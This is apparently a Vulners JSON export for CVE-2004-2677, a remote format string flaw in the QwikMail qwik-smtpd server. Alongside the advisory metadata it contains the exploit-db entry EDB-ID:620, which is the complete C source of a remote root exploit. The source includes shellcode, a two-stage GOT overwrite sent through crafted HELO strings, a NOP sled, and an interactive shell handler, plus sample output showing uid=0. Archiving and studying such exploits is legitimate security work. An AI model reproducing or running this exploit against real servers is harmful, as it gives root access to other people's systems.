{"edition": 1, "title": "qwik-smtpd Remote Format String Arbitrary Code Execution", "bulletinFamily": "software", "published": "2004-10-31T06:15:08", "lastseen": "2017-04-28T13:20:06", "modified": "2004-10-31T06:15:08", "reporter": "Dark Eagle(darkeagle@list.ru)", "viewCount": 1, "href": "https://vulners.com/osvdb/OSVDB:11303", "description": "## Vulnerability Description\nQwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.\n## Solution Description\nUpgrade to version 0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nQwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.\n## References:\nVendor URL: http://qwikmail.sourceforge.net/\nSecurity Tracker: 1012016\n[Secunia Advisory ID:13037](https://secuniaresearch.flexerasoftware.com/advisories/13037/)\nOther Advisory URL: http://unl0ck.info/advisories/qwik-smtpd.txt\nOther Advisory URL: http://www.securiteam.com/exploits/6H0062KBPM.html\nISS X-Force ID: 17917\nFrSIRT Advisory: ADV-2007-0687\n[CVE-2004-2677](https://vulners.com/cve/CVE-2004-2677)\nBugtraq ID: 11572\n", "affectedSoftware": [{"name": "QwikMail SMTP (qwik-smtpd)", "version": "0.2", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-2677"]}, {"type": "exploitdb", "idList": ["EDB-ID:620"]}], "modified": "2017-04-28T13:20:06", "rev": 2}, "vulnersScore": 6.9}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "cvelist": ["CVE-2004-2677"], "id": "OSVDB:11303", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:23:01", "description": "Format string vulnerability in qwik-smtpd.c in QwikMail SMTP (qwik-smtpd) 0.3 and earlier allows remote attackers to execute arbitrary code via format specifiers in the (1) clientRcptTo array, and the (2) Received and (3) messageID variables, possibly involving HELO and hostname arguments.", "edition": 4, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-2677", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2677"], "modified": "2018-10-19T15:30:00", "cpe": ["cpe:/a:qwikmail:qwikmail_smtp:0.3"], "id": "CVE-2004-2677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2677", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:qwikmail:qwikmail_smtp:0.3:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T12:33:20", "description": "Qwik SMTP 0.3 Remote Root Format String Exploit. CVE-2004-2677. Remote exploit for linux platform", "published": "2004-11-09T00:00:00", "type": "exploitdb", "title": "Qwik SMTP 0.3 - Remote Root Format String Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2677"], "modified": "2004-11-09T00:00:00", "id": "EDB-ID:620", "href": "https://www.exploit-db.com/exploits/620/", "sourceData": "/*\r\n** qwik-smtp Remote Root Exploit\r\n** -------------------------------\r\n**\r\n** Bug found by: Dark Eagle <darkeagle [at] list d0t ru>\r\n** Exploit coded by: Carlos Barros <barros [at] barrossecurity d0t com>\r\n** Home Page: http://www.barrossecurity.com\r\n**\r\n** Exploitation techinique:\r\n**\r\n** This bug is a simple format string bug. While coding this exploit, I found just two\r\n** \"problems\". The first is that our buffer is only 32 bytes long and the second is that\r\n** qwik-smtpd filters spaces chars with the isspace(), this way our 0x0b code used in the\r\n** shellcode is filtered. To circumvent the first problem I divided the exploit in two\r\n** stages. The first one overwrite the LSW of the exit() GOT entry and the second overwrite\r\n** the MSW. Then, we send an EXIT command forcing the qwik-smtpd to jump into our shellcode.\r\n** The second problem was \"fixed\" using another char (0x10) and then decrementing it before\r\n** calling the int 0x80 syscall.\r\n**\r\n** Notes:\r\n**\r\n** You MUST enter your external IP Address (when attacking remotely) or 127.0.0.1 (when\r\n** attacking locally) cause its IP is printed before our buffer, so its length MUST enter\r\n** in the calculation of the format string attack.\r\n**\r\n** sprintf(Received,\"Received: from %s (HELO %s) (%s) by %s with SMTP; %s\\n\",\r\n** clientHost, clientHelo, clientIP, localHost, timebuf);\r\n** ----------\r\n** Destination MUST be one valid email address on the target machine. If not, it will reply\r\n** with one erro code like this:\r\n**\r\n** -> Sending RCPT TO ... ERROR - 550 user not here\r\n**\r\n** Screenshot:\r\n**\r\n** [barros@BarrosSecurity qwik]$ ./a.out -h localhost -u barros@teste.com -t 0 -i 127.0.0.1\r\n**\r\n** ==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\r\n**\r\n** *** Target plataform : qwik_smtpd 0.3 - Fedor Core 2\r\n** *** Target host : localhost\r\n** *** Target port : 25\r\n** *** Target GOT : 0x0804b2e8\r\n**\r\n** *** Target Retaddr : 0xfeffe6f0\r\n**\r\n** -> Connecting ... OK\r\n** -> Getting the banner ... 220 SMTP service ready\r\n**\r\n** *** STAGE 1 ***\r\n**\r\n** -> Creating EvilBuffer ... OK\r\n** -> Sending HELO with EvilBuffer ... OK\r\n** -> Sending MAIL FROM with Shellcode ... OK\r\n** -> Sending RCPT TO ... OK\r\n** -> Sending DATA ... OK\r\n** -> Sending \".\" ... OK\r\n**\r\n** *** STAGE 2 ***\r\n**\r\n** -> Creating EvilBuffer ... OK\r\n** -> Sending HELO with EvilBuffer ... OK\r\n** -> Sending MAIL FROM with Shellcode ... OK\r\n** -> Sending RCPT TO ... OK\r\n** -> Sending DATA ... OK\r\n** -> Sending \".\" ... OK\r\n** -> Attacking ... OK\r\n**\r\n** Try to send some commands. If doesn't work, hit CTRL+C to exit\r\n**\r\n** Linux BarrosSecurity 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386 GNU/Linux\r\n** uid=0(root) gid=0(root)\r\n** exit\r\n** [barros@BarrosSecurity qwik]$\r\n*/\r\n\r\n#include <getopt.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <stdio.h>\r\n\r\n/*--< Prototypes >--*/\r\nvoid Usage(char *);\r\nvoid fatal(char *);\r\nint ConectToHost(char *,int);\r\nchar *CreateEvilBuffer(int,int);\r\nvoid doHack(int);\r\nvoid VerifyLastCommand(int, char *, char *);\r\nvoid SendBufferAndVerify(int , char *, char *, char *);\r\n\r\n/*--< Defines >--*/\r\n#define DEFAULT_PORT 25\r\n#define STDIN 0\r\n#define STDOUT 1\r\n#define MAX_BUFFER 1024\r\n#define NOPSIZE 200\r\n#define NOP 0x90\r\n#define BUFFER_OFFSET \"567\" // Keep these \\\"\r\n#define PADDING \".\" //\r\n\r\nstruct\r\n{\r\nchar *Name;\r\nint Gotaddr;\r\nint Retaddr;\r\n}Targets[] =\r\n{\r\n\"qwik_smtpd 0.3 - Fedor Core 2\",\r\n0x0804b2e8,\r\n0xfeffe6f0,\r\n\r\n// Finish\r\n0,\r\n0,\r\n0\r\n};\r\n\r\n// Shellcode by The Itch of Netric (www.netric.org)\r\nchar Shellcode[] =\r\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\" /* setuid(0); */\r\n\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\" /* execve() of /bins/h */\r\n\"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\"\r\n\"\\x53\\x89\\xe1\\xb0\"\r\n\r\n\"\\x10\\x48\\x48\\x48\\x48\\x48\" // Modified by Carlos Barros to skip isspace()\r\n\r\n\"\\xcd\\x80\";\r\n\r\nunsigned char STAGE=1;\r\nint IP_Len = 0;\r\n\r\nint main(int argc, char **argv)\r\n{\r\nextern char *optarg;\r\nextern int optind;\r\nchar opt;\r\nchar *Host = NULL;\r\nint Port = DEFAULT_PORT;\r\nint TargetNumber = 0;\r\nint Sock,i;\r\nchar *EvilBuffer;\r\nchar Buffer[MAX_BUFFER];\r\nchar *Rcpt_TO;\r\nchar Mail_From[NOPSIZE+strlen(Shellcode)+20];\r\n\r\nint ttt;\r\n\r\nfprintf(stdout,\"\\n==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\\n\\n\");\r\n\r\n// Process arguments\r\nwhile ( (opt = getopt(argc,argv,\"i:h:t:p:u:\")) != EOF)\r\n{\r\nswitch(opt)\r\n{\r\ncase 'i':\r\nIP_Len = strlen(optarg);\r\nbreak;\r\ncase 'u':\r\nRcpt_TO = optarg;\r\nbreak;\r\ncase 'p':\r\nPort = atoi(optarg);\r\nif(!Port) Usage(argv[0]);\r\nbreak;\r\ncase 't':\r\nTargetNumber = atoi(optarg);\r\nbreak;\r\ncase 'h':\r\nHost = optarg;\r\nbreak;\r\ndefault: Usage(argv[0]);\r\nbreak;\r\n}\r\n}\r\nif(Host == NULL || Rcpt_TO == NULL || !IP_Len) Usage(argv[0]);\r\n\r\n// Verify target\r\nfor(i=0;;i++)\r\nif(Targets[i].Name == 0) break;\r\nif(--i<TargetNumber) Usage(argv[0]);\r\n\r\nfprintf(stdout,\"*** Target plataform : %s\\n\",Targets[TargetNumber].Name);\r\nfprintf(stdout,\"*** Target host : %s\\n\",Host);\r\nfprintf(stdout,\"*** Target port : %u\\n\",Port);\r\nfprintf(stdout,\"*** Target GOT : %#010x\\n\\n\",Targets[TargetNumber].Gotaddr);\r\nfprintf(stdout,\"*** Target Retaddr : %#010x\\n\\n\",Targets[TargetNumber].Retaddr);\r\n\r\nfprintf(stdout,\"-> Connecting ... \");\r\nfflush(stdout);\r\nSock = ConectToHost(Host,Port);\r\nif(Sock == -1) fatal(\"Could not connect\");\r\nelse fprintf(stdout,\"OK\\n\");\r\n\r\nfprintf(stdout,\"-> Getting the banner ... \");\r\nfflush(stdout);\r\nif(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)\r\nfprintf(stdout,\"%s\",Buffer);\r\nelse\r\nfatal(\"RECV\");\r\n\r\nfor(;STAGE<3;STAGE++)\r\n{\r\nfprintf(stdout,\"\\n*** STAGE %d ***\\n\\n\",STAGE);\r\nfprintf(stdout,\"-> Creating EvilBuffer ... \");\r\nfflush(stdout);\r\nEvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr);\r\nfprintf(stdout,\"OK\\n\");\r\n\r\nfprintf(stdout,\"-> Sending HELO with EvilBuffer ... \");\r\nfflush(stdout);\r\nSendBufferAndVerify(Sock,EvilBuffer,\"250\",0);\r\nfree(EvilBuffer);\r\n\r\nfprintf(stdout,\"-> Sending MAIL FROM with Shellcode ... \");\r\nfflush(stdout);\r\n\r\n// Create the string MAIL FROM NOP+SHELLCODE\r\nstrcpy(Mail_From,\"mail from \");\r\nmemset(Mail_From+10,NOP,NOPSIZE);\r\nMail_From[10+NOPSIZE-1] = 0;\r\nstrcat(Mail_From,Shellcode);\r\nstrcat(Mail_From,\"\\n\");\r\n\r\nSendBufferAndVerify(Sock,Mail_From,\"250\",0);\r\n\r\nfprintf(stdout,\"-> Sending RCPT TO ... \");\r\nfflush(stdout);\r\nsnprintf(Buffer,MAX_BUFFER,\"rcpt to %s\\n\",Rcpt_TO);\r\n\r\nSendBufferAndVerify(Sock,Buffer,\"250\",\"251\");\r\n\r\nfprintf(stdout,\"-> Sending DATA ... \");\r\nfflush(stdout);\r\n\r\nsprintf(Buffer,\"data\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"354\",0);\r\n\r\nfprintf(stdout,\"-> Sending \\\".\\\" ... \");\r\nfflush(stdout);\r\nsnprintf(Buffer,MAX_BUFFER,\".\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"250\",0);\r\n}\r\n\r\nfprintf(stdout,\"-> Attacking ... \");\r\nsprintf(Buffer,\"quit\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"221\",0);\r\n\r\nfprintf(stdout,\"\\nTry to send some commands. If doesn't work, hit CTRL+C to exit\\n\\n\");\r\ndoHack(Sock);\r\n\r\nclose(Sock);\r\n}\r\n\r\nvoid SendBufferAndVerify(int Sock, char *Buffer, char *Code1, char *Code2)\r\n{\r\nif(send(Sock,Buffer,strlen(Buffer),0) == -1)\r\nfatal(\"SEND\");\r\nVerifyLastCommand(Sock,Code1,Code2);\r\n}\r\n\r\nvoid VerifyLastCommand(int Sock, char *Code1, char *Code2)\r\n{\r\nchar Buffer[MAX_BUFFER];\r\n\r\nif(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)\r\n{\r\nif(strstr(Buffer,Code1) || (Code2 && strstr(Buffer,Code2) )) fprintf(stdout,\"OK\\n\",Buffer);\r\nelse\r\n{\r\n*strstr(Buffer,\"\\n\") = 0;\r\nfatal(Buffer);\r\n}\r\n}\r\nelse\r\nfatal(\"RECV\");\r\n}\r\n\r\nvoid Usage(char *Prog)\r\n{\r\nint i;\r\nfprintf(stderr, \"Usage: %s -h hostname <options>\\n\\n\"\r\n\"Options:\\n\\n\"\r\n\" -i ipaddress : Your IP address\\n\"\r\n\" -u rcpt_to : Select one valid destination\\n\"\r\n\" -t target : Select the target\\n\"\r\n\" -p portnumber : Sets a new port number <default: 25>\\n\\n\"\r\n\"Targets:\\n\\n\",Prog);\r\n\r\nfor(i=0;;i++)\r\n{\r\nif(Targets[i].Name != 0)\r\nfprintf(stderr,\" [%u] %s\\n\",i,Targets[i].Name);\r\nelse\r\nbreak;\r\n}\r\nfprintf(stderr,\"\\n\");\r\nexit(1);\r\n}\r\n\r\nvoid fatal(char *ErrorMsg)\r\n{\r\nfprintf(stderr,\"ERROR - %s\\n\\n\",ErrorMsg);\r\nexit(1);\r\n}\r\n\r\nint ConectToHost(char *Host,int Port)\r\n{\r\nstruct sockaddr_in server;\r\nstruct hostent *hp;\r\nint s;\r\n\r\nserver.sin_family = AF_INET;\r\nhp = gethostbyname(Host);\r\nif(!hp) return(-1);\r\n\r\nmemcpy(&server.sin_addr,hp->h_addr,hp->h_length);\r\nserver.sin_port = htons(Port);\r\n\r\ns = socket(PF_INET,SOCK_STREAM,0);\r\nif(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)\r\nreturn(-1);\r\n\r\nreturn(s);\r\n}\r\n\r\nchar *CreateEvilBuffer(int GOT, int Retaddr)\r\n{\r\nchar *Buffer = malloc(500);\r\n\r\nif(STAGE==1)\r\nsprintf(Buffer,\r\n\"helo \"PADDING\r\n\"%c%c%c%c\" // GOT ADDR\r\n\"%%%ud\" // LSW(EGGAddr)\r\n\"%%\"BUFFER_OFFSET\"$hn\" // Write\r\n\"\\n\",\r\n((u_long)GOT),\r\n((u_long)GOT >> 8),\r\n((u_long)GOT >> 16),\r\n((u_long)GOT >> 24),\r\n\r\n((Retaddr & 0x0000FFFF) - (27+IP_Len))\r\n);\r\nelse\r\nsprintf(Buffer,\r\n\"helo \"PADDING\r\n\"%c%c%c%c\" // GOT ADDR\r\n\"%%%ud\" // LSW(EGGAddr)\r\n\"%%\"BUFFER_OFFSET\"$hn\" // Write\r\n\"\\n\",\r\n((u_long)GOT+2),\r\n(((u_long)GOT+2) >> 8),\r\n(((u_long)GOT+2) >> 16),\r\n(((u_long)GOT+2) >> 24),\r\n\r\n(((Retaddr & 0xFFFF0000)>>16) - (27+IP_Len))\r\n);\r\n\r\nreturn Buffer;\r\n}\r\n\r\nvoid doHack(int Sock)\r\n{\r\nchar buffer[1024 * 10];\r\nint count;\r\nfd_set readfs;\r\n\r\nwrite(Sock,\"uname -a;id\\n\",12);\r\nwhile(1)\r\n{\r\nFD_ZERO(&readfs);\r\nFD_SET(STDIN, &readfs);\r\nFD_SET(Sock, &readfs);\r\nif(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)\r\n{\r\nif(FD_ISSET(STDIN, &readfs))\r\n{\r\nif((count = read(STDIN, buffer, 1024)) <= 0)\r\n{\r\nif(errno == EWOULDBLOCK || errno == EAGAIN)\r\ncontinue;\r\nelse\r\n{\r\nclose(Sock);\r\nexit(-1);\r\n}\r\n}\r\nwrite(Sock, buffer, count);\r\n}\r\nif(FD_ISSET(Sock, &readfs))\r\n{\r\nif((count = read(Sock, buffer, 1024)) <= 0)\r\n{\r\nif(errno == EWOULDBLOCK || errno == EAGAIN)\r\ncontinue;\r\nelse\r\n{\r\nclose(Sock);\r\nexit(-1);\r\n}\r\n}\r\nwrite(STDOUT, buffer, count);\r\n}\r\n}\r\n}\r\n}\r\n\n\n// milw0rm.com [2004-11-09]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/620/"}]}